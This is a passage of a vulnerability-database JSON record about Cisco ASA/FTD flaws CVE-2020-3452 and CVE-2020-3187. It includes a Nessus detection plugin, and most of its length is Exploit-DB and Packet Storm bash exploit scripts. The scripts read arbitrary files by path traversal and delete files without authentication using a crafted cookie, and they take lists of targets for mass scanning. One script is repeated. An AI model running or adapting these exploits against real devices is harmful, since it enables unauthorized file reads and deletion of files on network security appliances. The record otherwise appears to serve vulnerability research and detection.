value:\"2020/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:adaptive_security_appliance_software\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:firepower_threat_defense\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('spad_log_func.inc');\ninclude('ssl_funcs.inc');\n\nfunction is_vuln(item)\n{\n local_var res, req;\n\n res = http_send_recv3(\n method:'GET',\n port: port,\n item:item,\n follow_redirect: 1,\n transport:transport\n );\n\n req = http_last_sent_request();\n spad_log(message:'Request:\\n' + req);\n\n if (empty_or_null(res))\n audit(AUDIT_RESP_NOT, port);\n\n if ('200' >< res[0] && 'Cisco' >< res[2] && 'Copyright' >< res[2] && 'dofile' >< res[2])\n {\n report = 'It was possible to retrieve the contents of portal_inc.lua using the following request:\\n' + req;\n return TRUE;\n }\n return FALSE;\n}\n\nport = get_http_port(default:443, embedded:TRUE);\ntransport = ssl_transport(ssl:TRUE, verify:FALSE);\nreport = '';\n\n# Check first endpoint\nvuln = is_vuln(\n item:'/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'\n);\n\n# Check second endpoint\nif (!vuln)\n vuln = is_vuln(\n item:'/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'\n );\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n\nsecurity_report_v4(\n port:port,\n severity:SECURITY_WARNING,\n extra:report\n);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2020-07-28T16:29:42", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-28T00:00:00", "published": "2020-07-28T00:00:00", "id": "EDB-ID:48722", "href": "https://www.exploit-db.com/exploits/48722", "type": "exploitdb", "title": "Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file read\r\n# CVE: CVE-2020-3452\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? ) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo \"downloaded!, $website is vulnerable to CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://www.exploit-db.com/download/48722"}], "packetstorm": [{"lastseen": "2020-08-01T01:16:14", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "PACKETSTORM:158647", "href": "https://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html", "title": "Cisco Adaptive Security Appliance Software 9.11 Local File Inclusion", "type": "packetstorm", "sourceData": "`# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion \n# Google Dork: inurl:/+CSCOE+/ \n# Date: 2020-08-27 \n# Exploit Author: 0xmmnbassel \n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 \n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 \n# Vulnerability Type: unauthenticated file read \n# CVE: CVE-2020-3452 \n \n \n#!/bin/bash \n \n \nread=\"%2bCSCOE%2b/portal_inc.lua\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3452\" \necho \"\" \necho \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:r:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nr ) read=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? ) helpFunction ;; \nesac \ndone \n \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \n \nif [ -z \"$website\"]; \nthen \nwhile IFS= read -r line \ndo \nname=$(echo $line | cut -c9-19) \n#echo \"testing $line\" \nfilename=\"$name.txt\" \n#echo $response \nstatus=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \n \nif [ $status -eq \"400\" ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \nwget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \n \nif [ -s $filename ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \necho \"downloaded!, $line is vulnerable to CVE-2020-3452.\" \n \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \ndone < \"$input\" \nelse \n \nname=$(echo $website | cut -c9-16) \nfilename=\"$name.txt\" \n \nstatus=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \nif [ $status -eq \"Bad Request\" ]; then \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \n \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \nwget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \nif [ -s $filename ]; then \necho \"downloaded!, $website is vulnerable to CVE-2020-3452.\" \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \n \nfi \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/158647/ciscoasa911-lfi.txt"}, {"lastseen": "2020-08-01T01:16:14", "bulletinFamily": "exploit", "description": "", "modified": "2020-07-29T00:00:00", "published": "2020-07-29T00:00:00", "id": "PACKETSTORM:158648", "href": "https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html", "title": "Cisco Adaptive Security Appliance Software 9.7 Arbitrary File Deletion", "type": "packetstorm", "sourceData": "`# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion \n# Google Dork: inurl:/+CSCOE+/ \n# Date: 2020-08-27 \n# Exploit Author: 0xmmnbassel \n# Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models \n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 \n# Vulnerability Type: unauthenticated file deletion \n# Version: Cisco ASA Software releases 9.5 and earlier, as well as \n# Release 9.7, have reached end of software maintenance. Customers are \n# advised to migrate to a supported release that includes the fix for \n# this vulnerability. \n# CVE : CVE-2020-3187 \n \n#!/bin/bash \n \ndelete=\"csco_logo.gif\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3187\" \necho \"\" \necho \"Usage: $0 -l targets.txt -d csco_logo.gif \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-d file to be deleted, default: ./+CSCOE+/csco_logo.gif\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:d:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nd ) delete=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? ) helpFunction ;; \nesac \ndone \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \nif [ -z \"$input\"]; \nthen \nstatus=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \necho \"checking if $website has the $delete file\" \nif [ $status -eq 200 ]; then \necho \"$website/+CSCOU+/$delete exists, deleting it...\" \ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o \nresultsindv.txt $website/+CSCOE+/session_password.html \ndelcheck=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ delcheck -eq 404]; then \necho \"Deleted!, $website is vulnerable to CVE-2020-3187.\" \nelse \necho \"Cannot Delete $website/+CSCOU+/$delete file, check it manaully!\" \nfi \nelse \necho \"$website/+CSCOU+/$delete doesn't exist!\" \nfi \n \nelse \nwhile IFS= read -r line \ndo \necho \"Checking $line if file $delete exist..\" \n#echo $response \nstatus=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ $status -eq 200 ]; then \necho \"$line/+CSCOU+/$delete exists, deleting it...\" \ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o \nresults.txt $line/+CSCOE+/session_password.html \n \n#for no verbosity \n#curl -H \"Cookie: token=..//+CSCOU+/$delete\" -s -o \nresults.txt $line/+CSCOE+/session_password.html \ndelcheck=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ delcheck -eq 404]; then \necho \"Deleted!, $line is vulnerable to CVE-2020-3187.\" \nelse \necho \"Cannot Delete $line/+CSCOU+/$delete file, check it manaully!\" \nfi \nelse \necho \"$line/+CSCOU+/$delete doesn't exist!\" \nfi \ndone < \"$input\" \n \n \nfi \n \n \n \n \n#!/bin/bash \n \n \nread=\"%2bCSCOE%2b/portal_inc.lua\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3452\" \necho \"\" \necho \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:r:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nr ) read=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? ) helpFunction ;; \nesac \ndone \n \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \n \nif [ -z \"$website\"]; \nthen \nwhile IFS= read -r line \ndo \nname=$(echo $line | cut -c9-19) \n#echo \"testing $line\" \nfilename=\"$name.txt\" \n#echo $response \nstatus=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \n \nif [ $status -eq \"400\" ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \nwget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \n \nif [ -s $filename ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \necho \"downloaded!, $line is vulnerable to CVE-2020-3452.\" \n \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \ndone < \"$input\" \nelse \n \nname=$(echo $website | cut -c9-16) \nfilename=\"$name.txt\" \n \nstatus=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \nif [ $status -eq \"Bad Request\" ]; then \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \n \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \nwget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \nif [ -s $filename ]; then \necho \"downloaded!, $website is vulnerable to CVE-2020-3452.\" \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \n \nfi \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/158648/ciscoasa97-filedelete.txt"}]}
